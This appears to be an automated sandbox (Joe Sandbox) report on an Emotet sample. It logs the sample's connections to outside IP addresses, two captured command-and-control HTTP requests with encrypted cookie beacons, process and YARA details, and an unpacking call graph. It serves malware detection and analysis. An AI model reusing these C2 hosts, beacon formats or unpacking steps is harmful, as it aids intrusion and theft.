                                May 9, 2023 03:25:30.498343945 CEST49177443192.168.2.22104.33.204.83
                                May 9, 2023 03:25:30.498425961 CEST44349177104.33.204.83192.168.2.22
                                May 9, 2023 03:25:30.498519897 CEST49177443192.168.2.22104.33.204.83
                                May 9, 2023 03:25:30.498999119 CEST49177443192.168.2.22104.33.204.83
                                May 9, 2023 03:25:30.499030113 CEST44349177104.33.204.83192.168.2.22
                                May 9, 2023 03:25:30.499147892 CEST44349177104.33.204.83192.168.2.22
                                May 9, 2023 03:25:31.316324949 CEST4917880192.168.2.22164.77.138.194
                                May 9, 2023 03:25:34.326220989 CEST4917880192.168.2.22164.77.138.194
                                May 9, 2023 03:25:40.332722902 CEST4917880192.168.2.22164.77.138.194
                                May 9, 2023 03:25:52.346601963 CEST4917980192.168.2.22164.77.138.194
                                May 9, 2023 03:25:55.357001066 CEST4917980192.168.2.22164.77.138.194
                                May 9, 2023 03:26:01.363354921 CEST4917980192.168.2.22164.77.138.194
                                May 9, 2023 03:26:13.428508043 CEST4918080192.168.2.22181.16.4.180
                                May 9, 2023 03:26:16.434293032 CEST4918080192.168.2.22181.16.4.180
                                May 9, 2023 03:26:22.440764904 CEST4918080192.168.2.22181.16.4.180
                                May 9, 2023 03:26:34.455245972 CEST4918180192.168.2.22181.16.4.180
                                May 9, 2023 03:26:37.464862108 CEST4918180192.168.2.22181.16.4.180
                                May 9, 2023 03:26:43.471313000 CEST4918180192.168.2.22181.16.4.180
                                May 9, 2023 03:26:55.626044989 CEST49182443192.168.2.22190.117.51.248
                                May 9, 2023 03:26:55.626154900 CEST44349182190.117.51.248192.168.2.22
                                May 9, 2023 03:26:55.626238108 CEST49182443192.168.2.22190.117.51.248
                                May 9, 2023 03:26:55.626491070 CEST49182443192.168.2.22190.117.51.248
                                May 9, 2023 03:26:55.626514912 CEST44349182190.117.51.248192.168.2.22
                                May 9, 2023 03:26:55.626601934 CEST44349182190.117.51.248192.168.2.22
                                May 9, 2023 03:26:56.686548948 CEST4918380192.168.2.2223.240.26.210
                                May 9, 2023 03:26:59.696723938 CEST4918380192.168.2.2223.240.26.210
                                May 9, 2023 03:27:05.703171968 CEST4918380192.168.2.2223.240.26.210
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                May 9, 2023 03:25:14.544099092 CEST8.8.8.8192.168.2.220x3aefNo error (0)windowsupdatebg.s.llnwi.net95.140.230.192A (IP address)IN (0x0001)false
                                May 9, 2023 03:25:14.544099092 CEST8.8.8.8192.168.2.220x3aefNo error (0)windowsupdatebg.s.llnwi.net95.140.230.128A (IP address)IN (0x0001)false
                                • 104.33.204.83:443
                                • 190.117.51.248:443
                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249177104.33.204.83443C:\Windows\SysWOW64\mapirepl.exe
                                TimestampkBytes transferredDirectionData
                                May 9, 2023 03:25:30.498999119 CEST4OUTGET / HTTP/1.1
                                Cookie: 18674=JyxsXom6UbN7L7x0MHExxPuLepdn8q8/Om8UbOCmxohol0zfPBX/bKtPMK+5zZZA2DAnlO8MktmnuMRWGsIrIkN32sQfzr40PfFCZTsnbbhUwwz7kdwqm8Imofqx3LACO6iiUpGQEkQUMjc95T/X4xOL0tR0Yg9wWhqlRvzmv8F+vOfm1b2hd30MRDlDqBbmWYr/cOYySeBgqZ5wXUMldk8EFnzOb8YQlSXAkdNp6Gbdt3odH8M7AW2fexhetxBM5uPENsIsnht/LScctTHRZ01dmYrwft9dayHFn2vFvEF59d5cLNDU4HPW5G8opPQJhNtyX3lS1Y75VuOY6PNfN+SRWGqdZ9mnbqmyJMItuT6EhvLk+lj6QP9M7yZVoDvOtc5BxZ8b+3c9fGGR+D/Qad4P7SI=
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 104.33.204.83:443
                                Connection: Keep-Alive
                                Cache-Control: no-cache


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.2249182190.117.51.248443C:\Windows\SysWOW64\mapirepl.exe
                                TimestampkBytes transferredDirectionData
                                May 9, 2023 03:26:55.626491070 CEST7OUTGET / HTTP/1.1
                                Cookie: 32794=ZXN/WSKexbCQHgzQEwfY8X7gFkPjuPH9ixTA2rYP3ZfmVxaykqF45JHOyd8U1tx/4fxTwAhH45gHxox2xkIvysWwKb2QuCU0ngEx2h1jSkgXHgs3FEvDbxxIQVOP9lY+PurSvUs09+JASqOo+ZQ8WCnghkt0Yg9wWhqlRvzmv8F+vOfm1b2hd30MRDlDqBbmWYr/cOYySeBgqZ5wXUMldk8EFnzOb8YQlSXAkdNp6Gbdt3odH8M7AW2fexhetxBM5uPENsIsnht/LScctTHRZ01dmYrwft9dayHFn2vFvEF59d5cBZULHKl4pQCgg/aIo2eAi3p3QgbNeU5eQRGIahaR6X/yYyymhPe8kyYVFpRaLcijP73Ept32tvtSZ1zp9tF/fzw9WbpfvzkDQ93ysCg09Fg=
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 190.117.51.248:443
                                Connection: Keep-Alive
                                Cache-Control: no-cache


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:1
                                Start time:03:24:13
                                Start date:09/05/2023
                                Path:C:\Users\user\Desktop\cGOpAkgTL.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\cGOpAkgTL.exe
                                Imagebase:0x400000
                                File size:334088 bytes
                                MD5 hash:B5E31F4E2836B8A67F8684988D224107
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.897365487.0000000000270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Emotet, Description: Emotet Payload, Source: 00000001.00000002.897365487.0000000000270000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.897323249.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Emotet, Description: Emotet Payload, Source: 00000001.00000002.897323249.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                Reputation:low

                                Target ID:2
                                Start time:03:24:14
                                Start date:09/05/2023
                                Path:C:\Users\user\Desktop\cGOpAkgTL.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\cGOpAkgTL.exe
                                Imagebase:0x400000
                                File size:334088 bytes
                                MD5 hash:B5E31F4E2836B8A67F8684988D224107
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Target ID:3
                                Start time:03:24:22
                                Start date:09/05/2023
                                Path:C:\Windows\SysWOW64\mapirepl.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\mapirepl.exe
                                Imagebase:0x400000
                                File size:334088 bytes
                                MD5 hash:B5E31F4E2836B8A67F8684988D224107
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Target ID:4
                                Start time:03:24:23
                                Start date:09/05/2023
                                Path:C:\Windows\SysWOW64\mapirepl.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\mapirepl.exe
                                Imagebase:0x400000
                                File size:334088 bytes
                                MD5 hash:B5E31F4E2836B8A67F8684988D224107
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:46.1%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:18
                                  Total number of Limit Nodes:0
                                  execution_graph 201 1ccce0 202 1cccf9 201->202 207 1cc430 202->207 204 1ccd99 210 1cc980 VirtualAlloc 204->210 206 1ccdd0 208 1cc46f 207->208 209 1cc48c VirtualAlloc 208->209 209->204 214 1cc9de 210->214 211 1cca89 212 1ccab1 211->212 213 1ccaa2 UnmapViewOfFile 211->213 215 1ccaba VirtualAlloc 212->215 217 1ccadc 212->217 213->212 214->211 216 1cca61 VirtualProtect 214->216 215->217 216->214 217->206 218 1cc520 219 1cc430 VirtualAlloc 218->219 220 1cc52d 219->220

                                  Callgraph

                                  Control-flow Graph

                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CC9C5
                                  • VirtualProtect.KERNELBASE(?,?,00000000,?,?,?,?), ref: 001CCA79
                                  • UnmapViewOfFile.KERNELBASE(?), ref: 001CCAAF
                                  • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001CCAD2
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.897294629.00000000001CC000.00000040.00001000.00020000.00000000.sdmp, Offset: 001CC000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1cc000_cGOpAkgTL.jbxd
                                  Similarity
                                  • API ID: Virtual$Alloc$FileProtectUnmapView
                                  • String ID:
                                  • API String ID: 238919573-0
                                  • Opcode ID: 906e68909d15a4fb586f7e88fc43e186f601afe9a98fa1fb1e7fddc7105f0e08
                                  • Instruction ID: 12b0bbffa6b38cb1fc3f8df20f648598822450a5fbb90d4e7994a861f8d1cfea
                                  • Opcode Fuzzy Hash: 906e68909d15a4fb586f7e88fc43e186f601afe9a98fa1fb1e7fddc7105f0e08
                                  • Instruction Fuzzy Hash: 45A197B5A00109DFCB08CF98D595EAEB7B5BF98314F208159E909AB341D735EE82CBD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 38 1cc430-1cc4a2 call 1cc810 call 1cc140 VirtualAlloc
                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CC49C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.897294629.00000000001CC000.00000040.00001000.00020000.00000000.sdmp, Offset: 001CC000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1cc000_cGOpAkgTL.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID: VirtualAlloc
                                  • API String ID: 4275171209-164498762
                                  • Opcode ID: ea834c74fc57b1eb379842a09c45168dceb37f59ab5946c3ea9aff66bb75d60b
                                  • Instruction ID: 33088ba143882f2d9fc997592cbd413d3e93e31f90e78ad0726bb960e18aa108
                                  • Opcode Fuzzy Hash: ea834c74fc57b1eb379842a09c45168dceb37f59ab5946c3ea9aff66bb75d60b
                                  • Instruction Fuzzy Hash: 4C01DE60D082C9EAEB01D7E88409BEFBFB55F21704F044098D5886B282D7BA575987B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%